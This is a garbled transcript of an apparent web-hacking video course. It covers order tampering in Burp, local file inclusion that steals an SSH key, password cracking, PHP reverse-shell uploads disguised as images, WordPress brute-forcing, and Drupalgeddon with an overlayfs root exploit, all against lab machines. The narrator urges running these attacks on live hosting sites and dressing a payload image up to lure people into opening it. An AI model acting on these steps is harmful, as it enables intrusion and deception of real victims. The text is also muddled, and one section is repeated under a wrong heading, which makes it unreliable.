So you just keep it this repeater. It's okay. Now we would like to create one more order here. Now we would like to come back here. So let I would like to disable for some time this one. Now let you go to home. Now we would like to click on this, add to basket, add to cart. Then where you would like to look here, the parameter id equal to 2 and add equal to 1, where I have got it here. Now we would like to look the item. Then I have created an address, so I just need to enter a card number. So 1234. So I just enter as 1234, 1234. Then where you have got the address ID here. Now we would like to try here once you come back here. So come to an repeater. We just try here as 5. Then try to send this at 200. Okay. Now we would like to look this. So it will take a little bit lengthy time process to present here. Now we got order 5 here. Once you look here as a 3, you get here as nothing here. Not found. It's like found, but it's not getting as a result here. Like we would like to add some parameter here, like come back here. So we just add here as address, we would like to add id equal to as 1, and where we would like to go for cutting, so I just need to add that one as, go to here, card number equal to, so 1 2 3 4 1 2 3 4 1 2 3 4 1 2 3 4, that's it. We try to do here. Now we just add it here as in the basket. Now we try here, try to send, it's also a not found. Now let me for I would like to try here as a 2, then you click on this a flow for redirection, waiting for here where I have got the item order 1 or 2, where I have got it this. Now orders we just try here as a 6, it's not getting. So how we would like to get this here? Now we try here as let we would like to come back here. Where is this request? Nothing else. So we would like to go to here as, go to here, uh, nothing else here. So let me, I just try here as one is, let I try add to here this one, add to basket. Then we would like to look this basket, then enter this, then card number is 1 2 3 4. Now let you can set up the listener here, Burp Suite. Then we would like to come back here, so you just off this, so we just switch on again. Now try to make the payment from here. We just send to this one as a repeater, where you got it here in the repeater in the second tab. Now in the second tab we have got the repeater. Now id equal to, you just try here with what we try to set, it's not found. Now we would like to go for a flow for the redirections, it's okay, which was done here. Now we would like to look here as a render, where order 6 is created, you have seen here. Now I would like to uh, change here as, let me try here as 7, it's not found. Now we would like to come back as 6, it's done. Now let it come back here, this where id, where we have got it here. Now I replace as 2, we try with that 2. Then we try to send here, nothing, we not it get. Then flow for redirection. Yes, now I have successfully get here. Now order 7. Now you can see here where we are creating directly. Now we would like to try here as 8. It's not found. So there is an somewhat little bit we need to identify here. Number 3 here. Now we would like to try to send here but not get a flow for redirection. Now order 8 is created. Now you can see a very easy way to identify and look the broken access control. So you don't need to enter any type of card details where you can getting directly here the broken access control. Now you want to try again, we just come back here. Now you just change where there is a 4 is already available. Now we just try with the 4 or 5 is available. Now let me try with, I just try with ID as 4. Let's we try here. Then click on flow for redirection. Now order 9 which was created. It's a simple way to create an orders. An easy way for guessing. That's it. This is for broken access control. Next, we are going to discussing about local file inclusion. So guys, now we are going to discussing about local file inclusion. So what is a local file inclusion? Local file inclusion is a type of vulnerability that occurs when a web application includes file on server through a user input without proper validation. This allows an attacker to track a web application into an exposing and executing a files that reside on the server. So how local file inclusion will work. Inclusion via file path manipulation. When web application takes an input like a file path from a user and includes a code, it might be allow attacker to manipulate the file path and access the sensitive information on the server. Then we would like to see an example also further. Then we would like to look like a common target for local file inclusion like etc password, otherwise etc posters or etc things, otherwise log files, session files also. Possible consequences like file disclosure and code execution and defense against for local file inclusion like input validation and whitelist approach, then disable the local file inclusion and avoid including a user input in functions that includes a files unless absolute necessary. Use real path functions like a PHP real path, etc. things. So now we would like to do the practical for local file inclusion for web application penetration industry. So you just type sudo su, enter the password, then you just type netdiscord-i hit 0. So first we would like to identify our target machine. So here is my targeted machine. Now I just quit. Now I just type here as nmap minus 34 minus age and press scan. Enter your targeted IP address 182.168.18.136. Then let's wait for the nmap result. Now we would like to open the Firefox. So where I got nmap result, one is available with the SH, another one is available with Apache server. Then let we try to open new tab. Now we would like to visit the first our targeted website. Let me would like to load this. So enter your targeted IP address 192.168.18.136. where get this. It's taking a too long time to come this. Yes, so it was skipped. Now we would like to get from here. So we would like to look the first as pesos. In the pesos also we not found any useful information. Then we would like to extract all here. First, I would like to go with the directory buster. We just type here as directory buster HTTP. Then enter your targeted IP address 192.168.136. So where I have got it here as a robots.txt, so just let it copy this one. We would like to visit the robots.txt. In the robots.txt here only I got hello hacker. Now we would like to look the pesos also. In these pesos we not get any useful, so we just leave it here. So where I not get anything else here, I have got another directory as secret, so we just copy this. Then we would like to visit this a secret. From secret, I not get any useful information. We would like to look the pesos also. Nothing. 1, 2, 3, 4, 5. Okay, let it be. Now, once you have copied this one, now we would like to go with the directory buster. We just paste this. Then let it. We would like to scan first only. Find the directories here. What else we can get it here? As we can see here, we are not getting any useful information. So now we try to move on here directly. So just type clear. Now I just pressed capital X, so I just need to get a PHP, then txt, then .html files, and to get all those things here. Let's see here what else we can get it here. So where I have got it, one is as evil.php, so I just copy this one. Now we just paste it here, evil.php. Now we would like to look the pesos. Here also a nothing. Now we try here as evil.php. I just try here as to find a parameter. Now we try to find a parameter using as actual HTTP parameter finding using as actual. So I just type here as actual. Just type yes. Enter your password. Let it come. This one. So except evil.php, we not yet find any useful information. Then we try with normally as a file equal to. Then I need to mention as a local file inclusion GitHub. So let me like to go for local file inclusion for GitHub. So we just get it from here. So let it come. So while here also we not yet get any useful information. Now let it fetch all this. So now it will take a little bit time to come. So let we just try here. So I just try to this one as local file inclusion. We just type here as etc and password. So this will take a long time to come. So now this. So we just type here as etc as password. So here we not yet get so the local file inclusion. You can look here. To identify the local file inclusion, it will take a long time. So let it be. So I would like to take all those things. So you just entirely just copy. Now, if you want to utilize as it's still in process, so I would like to clear this. So I just use f minus u for as URL. Then let it paste this. Then we would like to change as a in the file place. I not did get any type of result, so I just put as fuzz. Then let's come back here. Word list. You need to specify as word list here. The word list as user share a word list directory master directory list directory list 2.3 medium.txt. That's it. Now let it will keep on going. So to get as a right result, so I would like to utilize. So we cannot able to identify like this. So I just quit here and I just type clear. Now paste it here. Then you just type here as minus C minus R minus fs0. Now what is the main command that will be presented here? So where action is also done, so you just type action minus minus help. So we just need to put for a URL action minus u. Then URL is so you just need to copy entirely the evil.php. That's it. Then let it paste here. That's it. Now let where I have got it here as command. So where I have successfully identified the command. In the file place, I just need to put as a command and put for a local file inclusion. Now where I have seen here as a result. Now you can look here everything. Here I got it one is with the root daemon. Then where username is more. You can observe here more. And we can get this a login access and we can connect for this local file inclusion. That's it. Now we would like to try here. So every of targeted mission have the SSH. So let me show you here. So here we have red limit. So it install red limit. Now here this is I just put here. So we have identified for local file inclusion and we have got this one. Now I would like to show you here list minus a. So every of targeted website have .sh file. Where is this? cd .sh. So here you have for sh uh, for here. So I know have here for sh. So it's okay, no worries. So this machine. Now we would like to go for here as now. We just need to go for as hope. We just need to enter more.sh. Then we just need to print as id underscore rsa. We just try here. So where we have got it here id underscore rsa. Now we would like to look this as pesos. Where you have got this id underscore rsa. Now we just entirely copy this one. Sorry, we just make it as very big. Let me just so entirely I just copy this one. Now let it come back here. Now you just type here wc get and paste it. Where we have got the id underscore rsa. Now just type list. Oh, this is very ridiculous. So I just need to copy entirely here. So just copy, remove and paste it. Now just type clear. Now we just need to save this one as output as we just need to save id underscore rsa mode. That's it. Where we have got it list. So just copy, just type remove this. I just type list. Now you just type your cat id underscore rsa underscore mouth. So where here also I not get it here. So you just remove this id underscore rsa underscore mouth. So I not get anything else here. So it's just like a little bit frustrated. It's okay, no worries. Now let we try here. So let's try here. So it's not working. Now I have already in the Firefox. Come back here. So where you have already this certificate, so you just copy without ever string a time. So you just type nano id underscore rsa. Then let it paste it here. You just type Control O, Control X. So where you have done here. Now we try to log in here directly. So you just type here as chmod 600 id underscore rsa. So you just give a permission for that sh minus I id underscore rsa. Username as what is this username? Mori. This is the username. So just copy Mori. Enter your targeted IP address 192.168.18.136. It's asking fingerprint, yes. So it's asking a password. So we are unable to go. So we have exploited the local file information, but we need to go and connect it. So this is our task. So for that, sh to jump, you just type id underscore rsa to hash. So where we have saved this one in the hash. Now I just type as John. First, I just need to as a gunjib uh, user share wireless rocky.txt.zz. So just type sudo su, enter the password, then you just type here as just copy, paste. Now, which was once it's came, then we would like to utilize. So just type exit. Now, we would like to utilize here, so just type as job. Specify for hash minus minus wireless equal to. You just need to specify only this one as user share wireless rocky.txt. So just copy, paste it. That's it. Now, let's see here, it will crack the password. So, where the password is unicorn. So, just type copy this one. Now, just come back here, search, enter, paste the password, where you have successfully logged in through our local file inclusion and we have bypass. That's it. So, just type here ID. That's it. This is how you can do the local file inclusion. That's it. Going to discussing about remote file inclusion. Before we discuss about local file inclusion, now we are going to discuss about remote file inclusion. It's a type of web vulnerability that occurs when web application allows a user to include a files for external server. It is a code to execute a remote file inclusion. It's similar like a local file inclusion, but instead of including a files from the local server, it will allows a inclusion for a remote locations, leading to uh, much more a risk since attacker can inject a malicious file posted in the remote files. So how this will be work? A remote file inclusion. Remote file vulnerability usually arises when an application allows a user input to specify a file to be included in the application's execution without properly a sanitized or validation input. Now we would like to look that. Just open the terminal. You just type sudo su, enter the password, then you just type netdiscordance is 0. So first we would like to identify our machine. So here I identify my machine. Now I just type here as nmap minus 34 minus a is an aggressive scan. Now we already know that we would like to come back here. Let's wait for the nmap result. I got the nmap result. We would like to dive here now. Enter your targeted IP address 192.168.18.139. Now we would like to look here like remote file inclusion. So try a George image uploader. We would like to open this one in the new tab, uploader 2. Now I got it here as uploader 3 also. That's it. Now we would like to look here where we would like to get here. Now first we would like to open this a new tab. We just go with the directory buster, enter with the targeted IP address. So where we not yet get it here. Now I just type here as with the PHP extensions I would like to look to get an exploit here. So we would like to get for this one. So we have a 3 files to make a remote file inclusion. Now you just also enter the targeted IP address. So I would like to enter normally by uploader 1. Now we would like to look as uploader.php, where upload is fake. That's okay. Now we not yet get anything else here. Also here we not yet get uploader.php. That's fine. Now we would like to enter as uploads. We not yet get here. Then where we have uploads 1, yes, we have here. We found the directory. Now we can easily find the directory is 2 we found. Now a 3 we found here. Now to upload a file, we would like to look here as which type of files we would like to upload in this. So now I just come back here. ID where upload image. So it asks image. Now we would like to put here. So first I would like to get the PHP reverse shell. We just type here as PHP reverse shell pentest monkey. So let me get it from here. So go back here. So this is our PHP reverse shell. We would like to get this PHP reverse shell. So we just copy this one, we just copy it here, come back here. So just type clear. So just type here as mousepad rshell.php, then entirely just paste it here, scroll down here, enter the target IP address of your Kali Linux machine 192.168.18.137. That's it. So just leave it as it is. So if you want to cross check, so just cut this. Now just type here as ifconfig 137, which was inputted successfully. Now just type clear. Now just type here as mousepad rshell.php. So we cross check, it was successfully done. Now we just type here as netcat lvnp 1234. Now let's come back here. So where is a George image uploader? So just click on the browse file. Now go to home tab. So just select your reverse shell.php. Just open, upload the image. Where here file is valid and was successfully uploaded. Here is some more debugging into array. Upload file in the array. Name of the file rshell.php, application with x equal to php temp that was saved. It was 5 kilobyte. So where we have set up the netcat listener. Now we have getting the root reverse shell here with a remote file inclusion. Now if you click on this, we have successfully got the reverse shell here. That's it. This is how you can get the remote file inclusion. Now we just go for a second one. Now I just fit here. Now we would like to walk to our second one. We just close this. So this is the second one. We would like to look as inspect the elements of this one. Body file type, upload a file, upload image. Now it's upload image means we would like to go back here. So we try here as same. Then let it upload here. File it's not image, sorry, it's only accept JPG. JPEG or PNG and GIF. Now let's come back here. Now I just type as a copy as rshell.php2 uh, rshell.php.jpg. So that's great. Now I just make it as a nano rshell.php.jpg. Then we just come back here. So I just add here as gif 98a. That's it. So just save this. Now we just write netcat lvnp 1234. Now I just try here, go back here. Now let me browse this as rshell.php.jpg. Then let it upload here. So you can see a success, the image of the GIF. The file of rshell.php.jpg has been uploaded. So we have successfully uploaded here. Now let's come back here. We just go to as uploads to, where we have got it as rshell.php.jpg. So you just click here. So we are bypassing automatically here, very clear. So where you have got the netcat listener. Now we just need to try as the last one is the same, similar one. Now just close this. Now the charge. Click on the white box to select the field of JPG or image. So it's also the same way. So you just click on upload, where file upload successfully rshell.php.jpg, image jpg 5 kilobytes. So where we have successfully uploaded of remote file inclusion. Now we would like to go for uploads 3. Then we would like to go for rshell.php. So where this you can work out the remote file inclusion. So you can similarly test any one of the targeted live website. So these are hosting websites. It's very easy to execute it. That's it. Now we would like to go for next as arbitrary image exploit. So guys, now we are going to discussing about arbitrary file upload and arbitrary file download. So what is this arbitrary file upload and download? So vulnerabilities are occur when an attacker can upload or download a file or to or from a web server without a proper validation or restrictions. These vulnerabilities are practically dangerous as they can lead to a data exposure, code execution, and other service impacts on the security of the web application. So, we would like to know what is arbitrary file upload vulnerability. These vulnerabilities allow attacker to upload a malicious file on the server, leading a code and execution a malware distribution or a DOS of service, like denial of service. And arbitrary file download. A vulnerabilities allow an attacker to download a sensitive files from the server, exposing a critical information that could lead a further attacks. Now let's open the terminal. We would like to walk to directly as sudo su, enter the password, then you just type netdiscord-i is 0. So first we would like to do the practical here, then we would like to continue from here. So where this is my targeted machine. So I just quit now, you just try nmap -34 -a is an aggressive scam. Let if you walk to this directly as an targeted IP address. So let me show you here. enter your targeted IP address 192.168.18.114. Let where it will directly go to a MOA. That's okay. Now I would like to show you here before. So where I have already entered here in the my local hosting. That's it. So I just type close. I would like to show you here where I have entered with my targeted IP address. So as long as it's in the WordPress website, we would like to first do the directory bootstrap. Just copy this one, come back a new tab. We would like to type here as this one. So as it is in the WordPress website, you don't need to think too much because it may get a default like a WP admin, WP content, or etc things. So you don't need to worry much about this one. Once you have got it this, you have got it already. So that's it. WP admin, WP content, WP includes. Okay, this is the main two directories. So we would like to open the link. We would like to see here uh, we don't know the username and password. For that we would like to come back here, uh, open new tab. So we would like to utilize as WP scan minus minus URL, paste the targeted URL, enumerate the users and plugins. So let it enumerate first this users and plugins. So let's wait here, it will be enumerate, then we would like to go further. So where I have extracted the username. So for this, I would like to list all as users dot txt. Now let me. I just copy and paste all the users. So let it paste it here all users one by one. So you don't need to think here. So we have extracted the all users, and also we would like to look here as something interesting. So just copy. Let it paste it. Come back here. So user, then job stuff, then we would like to use a boy. So where I have made the list of users, so just type uh, you just type here cat users.txt. So where I have listed the users.txt, then you can also observe here. So we need to go here as WordPress theme is 2017, 2020. Then this is the WordPress theme which was last updated 2024 7/16. That's okay. WordPress version is 5.5.3. That also great. Now we would like to identify somewhat information. So just type here. Now we need to crack the password utilizing the users.txt, and I would like to use a rocky.txt. So just type here as concept user share a word list rocky.txt get. So where it will extract and written in the txt format. Now we would like to look here. Okay, so I specify the password as, so that rocky.txt we need to enter, but that will take a long time. So I just need to specify only the password.txt. That's it. That let it check. Then we would like to go further. Now, let it crack this password. So where I have identified the valid password, one is with the jogstra or this one. So you just enter the password. So this is the password and this is the username. That's it. So just copy and log in here. Jogstra. Once you have log in here, so we have login here. Also, we can see here, hey, there is a new WP discussion plugin. It's a great. You have to try it out this to get started with moderating editing. So we would like to look for the comments. Then uh, we would like to look this post. Now, I have a look this post. Now, we would like to look here. We can upload, add image to this. So, we would like to upload an image here. Now, we have here all the image we would like to utilize as an image. So, we would like to look the uh, let me come back here. Where is this downloads? Let me open the folder. So I have a two images. Okay, so let me I just need to put a backend of the PHP revert shell. So when you would like to go to any of the targeted website, okay, you just need to make it something attractive to look very clear. For that we would like to use a this targeted of image. So I would like to use this image so people they will attract and like they can uh, see that one. Now I don't want to utilize this one because most people they're not gonna get excited and watch. So you most probably need to look how you can convince the people and get it done. Okay, so I would like to utilize only this image. So for that, I already got the Notepad++ here in the Notepad++ for a Linux. So let it open that one. So Notepad++ is not supported for Linux, but we can use a running as a while. So I would like to utilize running through an while, and I have already installed a while here. So for that, let me just type clear. Now we would like to go to as cd downloads type plus. We just type as white, then let it paste this. So let it go here first. Let the white is starting, so you just click on OK. Then let it set up this in Notepad. Then no need. We would like to go here now. Now let it. Now it was started the nmap. I mean the file. Okay. Notepad is started now. So this is my notepad. So I want to put a backend of the payload as a PHP reverse shell to get a connected here. So for that, let me you just type here file, uh, open a file. Now let you just click on my computer. Then you would like to click on C. Then click on users. Then we would like to click on Pentester Club, where we would like to look here as downloads. Here I have mia.jpg, so I just need to utilize in here where this photo. So I don't want to put this one for look like very attractive. Let it come back here, mia.jpg. So let it open. So once this is entirely open, scroll down entirely here, click on here, come back here until 1010. Now we need to take a PHP reversal, come back here, open the terminal. Now let me open the terminal. Now let you just type here list. Okay, go to a cd, you just type here, you type list. So I have here a PHP reversal. So just type here as ifconfig is 143, my targeted IP address. You just type here as a mousepad shell.php. That's it. Then we would like to I would like to come back here. You just need to change here 127.0.0.12, enter your targeted IP address and don't change anything else. That's it. So you just click on save, entirely just copy this a reversal. Once you copy, you just close this. Now let you just open this notepad, you just paste it here. Where you have pasted here. Now we would like to get here 192.168.18.143 and change this 1234. Okay, so I would like to save as a in computer C users Pentester Club, go to a downloads, users. Okay, so I would like to save this one as not a text file. Let me, I just need to put as all files. Then mia.jpeg. So I'd like to put mia.jpeg. So let me save that one. Now let's come back here. So this is the original file. So this is not the mia.jpg. This is not the original file. This is the payload file. You look here, jpeg. Jpg is not the payload file. Now let me. I would like to put this one as. Now go to as downloads. Now move as mia.jpeg to mia.php. Here also I have created. Here I have created here as a PHP also. So this is the payload one. Now we would like to go back here, come back here, pwnr. So we just click on this, come back to a downloads, mia dot, no. So I just put here PHP, then let it open here. Now you can look here, you just write here, very good, did I look pretty? Then you can post the comment. So once you have posted the comment into any one of the targeted uh, of your targeted IP address, so you just type here netcat minus lvnp 1234. Where is your port? Okay, that is important here. Now we would like to come back here. So you just click on copy the link. So once you have copied the link, you just paste it here. More WP content where you have got it the uploaded file. Now we just try here. It was go for circling. Now where you have uploaded the targeted file and that was get the result, and you have also got the netcache listener and it was connected where people's they gonna upload a image type of arbitrary file of upload files upload, and once peoples they download also will get their sessions and everything. That's it. So this is how you can do the arbitrary file upload and arbitrary file download. Now later we're gonna discuss about using components with the known vulnerabilities. That's it. So guys, now we are going to discussing about using components with known vulnerabilities. It's a critical security risk that occurs when an application or a system integrates a third-party libraries or framework or a software package that have publicly known the security flaw. This risk is one of the top issues highlighted in the security framework, such as OWASP top 10 vulnerabilities. So, uh, why it will be happen? Because of outdated software and lack of security awareness and transitive dependencies and inadequate for testing, like insufficient security testing and monitoring might fail to identify the presence of vulnerable components in the system. Now we would like to look for that one, how this will be get it done. So just open the terminal. So we would like to test this. So first we just write sudo su, enter your password, then you just write netdiscover -80. Then we would like to identify our target machine here. Then we would like to walk to that directory. So let it go first here. Then later we would like to continue here. So here is I identify my target machine. Now I just quit now, you just write here as mmap -34 -a is an aggressive scan and enter your targeted IP address. Let's see here I have installed this is in the Apache and it was in the Ubuntu where it have http robots.txt, then includes themes installed with the postgresql.txt and license.txt. Welcome to the La Ordre Fiscal, this Grande Society. It was in the Drupal. So we would like to get this. So you just open this. Then you just enter your targeted IP address only 192.168.18.145. There you get this one. Let it see here where you got this. It was in the Drupal. Now, to identify the Drupal exploits, otherwise a known vulnerability. So, we would like to utilize as such exploit Drupal. We can identify here a lot of vulnerabilities to look here. You are looking here a lot of vulnerabilities. Uh, Now, to get to know about a known vulnerabilities, for that, we would like to utilize as this is in a Drupal. Like we would like to use like cache poisoning, otherwise news message HTML, where we can get this a text and we can flow that one. Then multiple persistent for cross-site scripting vulnerabilities. There also you can look at this one. So there are a lot of vulnerabilities is available here. You just need to check each and everything very carefully. Now, also, we would like to look here as uh, you can look also here. So, let me I just clear here. So, just type here as Drupal and Drupal Gidal. No, sorry, we would like to enter Here we not yet get here anything else. Uh, so if you not yet get anything else here, so you don't need to mind anything. So you just need to search only a Drupal 7. You can also get somewhat exploit. You can see a Drupal 7 version 7, where you can get like a Drupal Gidon with a SQL injection, add admin as a user, and SQL injection as admin as section. There a POC exploit will be there. So you don't need to go and purchase with zero day exploits. All are here inbuilt. So you need to know a little bit programming language. Then you can make it very a simple and easy way to uh, get it done this one. Now, uh, we would like to look here. So also, if you want to to exploit otherwise furthermore, you need to get like any type of exploit. So you just utilize with the such exploit as for Firefox. You can look here. You get a lot of exploit for Firefox. Windows, Linux, macOS, everything you can get here. All a remote memory corruption where XLS, this is a proof of concept is one, so where you can get it here. So all exploits is inbuilt here. Also I can show you here for known vulnerabilities. So just write here as such exploit for a WhatsApp. You can look here a remote change a status where it is available for web apps. So you can you can change the WhatsApp automatically of the status. Then Android for DOS. So uh, RTP processing for heap corruption, like a memory corruption. So if you learn the malware development, then you can understand what is heap corruptions and everything. Then reboot a crash app. So for Android, for WhatsApp, if they for reboot, that the phone will be corrupt also. For it's like it will go for a DOS attack. So it will send higher of requested with this vulnerabilities. And also look like memory corruptions here also. Then this is in the C programming. This is in the Python. This is in the bash script. This is in the txt format. You can understand and you can execute that. So when you read any type of vulnerabilities, and first if you get any type of vulnerabilities, first analyze the source of code, then you can execute it. That's the best task to perform any other things. Also, you can see our desktop, a persistent cross-site scripting with a WhatsApp web. So once you log in into the desktop, any type of WhatsApp, then you can do the persistent attack. This is called a known type of vulnerability. So we would like to do the known type of vulnerabilities. So just I would like to execute one. So I just type here as MSF console. So let it start this MSF console. So here we have started for the Metasploit. Now this is for our targeted to exploit this machine, otherwise this targeted website. So how we would like to use this one? Now let me would like to come back here. So let it start here. So just type here as such Drupal Gira. So where I have here exploit for multi-HTTP, this was written in the CVA 2014. Then excellent for Drupal HTTPS. This is key for value for SQL injection. So We can also look for as this CVE. So just copy this one. So here not it mentioned as CVE ID. Now you can look this. So just let me. I just copy this Drupa Gira. Now let me. I would like to search by exploit DB. So just type here as exploit DB. So where we would like to look the first one here, Drupa Gita. So you can analyze here the entire of the source code. You can look here. This will not be verified. It's just a simple source code. Proxies with the 127.0.0.1 Then go here proxy. So these are nothing. So it's this is a simple source code for the Drupal VLAN. So we would like to utilize the Metasploit. So you just type here as use 0. Then once you type as use 0, then you have got here. Now what you just type here as show options. Then you just type here set rhosters, enter your target. IP address 192.168.18.145. That's it. So R port is clear, then SL is false, there is no targeted URI, virtual host. L host is your kernel Linux IP address, L port is your targeted port. So you just type here as just exploit. Like you can see here how easily you can get this. So where the machine is automatically exploited. Now we would like to get furthermore. Let's see here. So where I have successfully got it, you just type shell, you just type ID, you got it. So you just type here as who am I, you got it. And you just type here as which Python, you get it here. So you just type here as Python and C, import apdy pdy spad bin bash. So sorry. So we just type here as Python and C, import apdy span bin bash. Now you just type as cd home, so you can explore all those things. What else here have guest user, you just type listmans here. That's it. cd a Drupal listmans here. That's it. There is nothing else, anything else here to get it here. So I can also show you here as something we would like to type here as. So I can also show as something as you just type here as uname -a. So where here have a Drupal Linux, so you just copy a Linux as Drupal. So let it copy. So for a known vulnerabilities, so you just again you come here as exploit, let it paste only this one. That's it. Then I would like to take this as C programming as for Ubuntu 12.40, 12.04, 14.04, where you have overlays, local privilege escalation. Now, let me would like to look here. This is same. Now, let me, you just type here as a exploit -m. Let me take this exploit. We have get to this exploit. Now, you just want to read as 37292.ac. So you can read this exploit, everything. That's it here. Now you can look here a CVA 2015 and 1238. So we would like to read this for exploit. So just come back here. That you would like to look here as uh, in the exploit DB only, you would like to look the known vulnerabilities. So Linux kernel 3.13 for Ubuntu 12.4, 14.4 overlays for local privilege escalation. So this is the one. So we need to read. So what else we have to get it from as an such exploit? It's similar like an exploit database. Now, if you would like to read here as a cvamitre.org, then we can understand here very clearly. You can see here, this is date of record. Nothing here is CVS, severity rating, fixed information, vulnerable software version, everything. So 2015. So where a security focus. So it was taking a too long time. You would like to utilize this one, so you just type here. Now just type list. Now you just type here as Python minus f http dot is server. That's it. Now let me would like to come back here is cd a temp directory list minus air. You just type here as wget http enter your target IP address 192.168.18.143 and 8000. Then we would like to type here as just copy this one, let it paste it where we have got it here. So just type here list minus here. Now you just type here gcc paste it our exploit output as uh, privilege. So where you have got it here, now you just type list. So you just type here as privilege. So where you have entirely got the read and write access of this machine. So you are in the right track now. So you have got everything now. Now just type ID, we are in the root directory. So you just type here cd a root a list minus here. So that's it. Here, nothing else. So this is how you can do with the uh, components of known vulnerabilities. That's it. So you have got all those things here. That's it. Now next we are going to discussing about command injection. So guys, now we are going to discussing about using components with known vulnerabilities. It's a critical security risk that occurs when an application or a system integrates a third-party libraries or framework or a software package that have publicly known the security flaw. This risk is one of the top issues highlighted in the security framework, such as OWASP top 10 vulnerabilities. So, uh, why it will be happen? Because of outdated software and lack of security awareness and transitive dependencies and inadequate for testing, like insufficient security testing and monitoring might fail to identify the presence of vulnerable components in the system. Now we would like to look for that one, how this will be get it done. So just open the terminal. So we would like to test this. So first we just write sudo su, enter your password, then you just write netdiscover -i is 0. Then we would like to identify our target machine here. Then we would like to walk to that directory. So let it go first here, then later we would like to continue here. So here is I identify my target machine. Now I just quit. Now you just type here as mmap minus 34 minus a is an aggressive gap and enter your target IP address. Let's see here I have installed this is in the Apache and it was in the event 2 where it have stdp robots.txt, then includes themes installed with the postgresql.txt and license.txt. Uh, Welcome to the La Ordre Fiscal, this Grande Society. It was in the Drupal. So we would like to get this, so you just open this, then you just enter your targeted IP address only 192.168.18.145. There you get this one, like it's here where you got this. It was in the Drupal. Now, to identify the Drupal exploits, otherwise a known vulnerability. So, we would like to utilize as such exploit Drupal. We can identify here a lot of vulnerabilities to look here. You are looking here a lot of vulnerabilities. Uh, Now, to get to know about a known vulnerabilities, for that, we would like to utilize as this is in a Drupal. Like we would like to use like cache poisoning, otherwise news message HTML, where we can get this a text and we can flow that one. Then multiple persistent for cross-site scripting vulnerabilities. There also you can look at this one. So there are a lot of vulnerabilities is available here. You just need to check each and everything very carefully. Now, also, we would like to look here as uh, you can look also here. So, let me I just clear here. So, you just type here as Drupal and Drupal Gidal. No, sorry, we would like to enter. Here, we not get here anything else. Uh, So if you not yet get anything else here, so you don't need to mind anything. So you just need to search only a Drupal 7. You can also get somewhat exploit. You can see a Drupal 7 version 7 where you can get like a Drupal Gidon with the SQL injection, add admin as a user and SQL injection as admin as section. There a POC exploit will be there. So you don't need to go and purchase with a zero day exploits. All are here inbuilt. So you need to know a little bit programming language. Then you can make it very simple and easy way to uh, get it done this one. Now, we would like to look here. So also, if you want to like to exploit otherwise furthermore, you need to get like any type of exploit. So you just utilize with the such exploit as for Firefox. You can look here. You get a lot of exploit for Firefox. Windows, Linux, macOS, everything you can get here. All a remote memory corruption where XLS, this is a proof of concept is one, so where you can get it here. So all exploits is inbuilt here. Also, I can show you here for known vulnerabilities. So just write here as such exploit for a WhatsApp. You can look here a remote change a status where it is available for web apps. So you can you can change the WhatsApp automatically of the status. Then Android for DOS. So RTP processing for heap corruption, like a memory corruption. So if you learn the malware development, then you can understand what is heap corruptions and everything. Then reboot a crash app. So for Android, for WhatsApp, if they for reboot, that the phone will be corrupt also. For it's like it will go for a DOS attack. So it will send higher of requested with this vulnerabilities. And also look like memory corruptions. here also. Then this is in the C programming, this is in the Python, this is in the bash script, this is in the txt format, you can understand and you can execute that. So when you read any type of vulnerabilities, and first if you get any type of vulnerabilities, first analyze the source of code, then you can execute it. That's the best task to perform any other things. Also, you can see our desktop, a persistent cross-site scripting with a WhatsApp web. So once you log in into the desktop, any type of WhatsApp, then you can do the persistent attack. This is called a known type of vulnerability. So we would like to do the known type of vulnerabilities. So just I would like to execute one. So I just type here as MSF console. So let it start this MSF console. So here we have started for the Metasploit. Now this is for our targeted to exploit this machine, otherwise this targeted website. So how we would like to use this one? Now let me would like to come back here. So let it start here. So just write here as such Drupal Gira. So where I have here exploit for multi-HTTP, this was written in the CVA 2014. Then excellent for Drupal HTTPS. This is key for value for SQL injection. So we can also look for as this CVE. So just copy this one. So here not it mentioned as CVE ID. Now you can look this. So just I just copy this Drupal Gira. Now I would like to search by exploit DB. So just type here as exploit DB. So where we would like to look the first one here, Drupal Gira. So you can analyze here the entire of the source code. You can look here. This will not be verified. It's just a simple source code. Proxies with 127.0.0.1 Then go here proxy. So this are nothing. So it's this is the simple source code for the Drupal Gira. So we would like to utilize the Metasploit. So you just type here as use 0. Then once you type as use 0, then you have got here. Now what you just type here as show options. Then you just type here set rhosters, enter your target, right? IP address 192.168.18.145. That's it. So R port is clear, then SL is false, there is no targeted URI, virtual host. L host is your kernel Linux IP address, L port is your targeted port. So you just type here as just exploit. Like you can see here how easily you can get this. So where the machine is automatically exploited. Now we would like to get furthermore. Let's see here. So where I have successfully got it, you just type shell, you just type ID, you got it. So you just type here as who am I, you got it. And you just type here as which Python, you get it here. So you just type here as Python -C. import apdy span bin bash. So sorry. So we just type here as python -c import apdy span bin bash. Now we just type as cd home, so you can explore all those things. What else here have guest user? You just type listmans here. That's it. cd a Drupal listmans here. That's it. There is nothing else, anything else here to get it here. So I can also show you here as something we would like to type here as. So I can also show as something as you just type here as uname -a. So where here have a Drupal a Linux, so you just copy a Linux as Drupal. So let it copy. So for a known vulnerabilities, so you just again you come here as such exploit. Let it paste only this one. That's it. Then I would like to take this as C programming as for Ubuntu 12.40, 12.04, 14.04, where you have overlays, local privilege escalation. Now, let me would like to look here. This is same. Now, let me, you just type here as a such exploit -m. Let me take this exploit and we have get to this exploit. Now we just want to read as 37292.ac. So you can read this exploit, everything. That's it here. Now you can look here a CVA 2015 and 1238. So we would like to read this for exploits. So just come back here. Let you would like to look here as in the exploit DB only. You would like to look the known vulnerabilities. So Linux kernel 3.13 for Ubuntu 12.4, 14.4 overlays for local privilege escalation. So this is the one. So we need to read. So what else we have to get it from as an such exploit? It's similar like an exploit database. Now we would like to read here as a cvamicre.org. Then we can understand here very clearly. You can see here this is date of record. Nothing here is serious severity rating, fixed information, vulnerable software version, everything. So 2015. So where a security focus. So it was taking a too long time. You would like to utilize this one, so just type here. Now just type list. Now you just type here as python -f http dot is server. That's it. Now let me would like to come back here is cd a temp directory list -f. You just type here as wget http. Enter your target IP address 192.168.18.143 and 8000. Then we would like to type here as just copy this one, let it paste it where we have got it here. So just type here listmans here. Now you just type here gcc paste it or exploit output as privilege. So where you have got it here. Now you just type list. So you just type here as privilege. So where you have entirely got the read and write access of this machine. So you are in the right track now. So you have got everything now. Now just type ID. We are in the root directory. So you just type here cd a root ls minus here. So that's it. Here, nothing else. So this is how you can do with the uh, components of known vulnerabilities. That's it. So you have got all those things here. That's it. Now next we are going to discussing about command injection. So guys, now we are going to discussing about command injection. So it's a critical web vulnerability that allows an attacker to execute an arbitrary command and host operating system via a vulnerable application. This typically occurs when to a system shell or directly to a 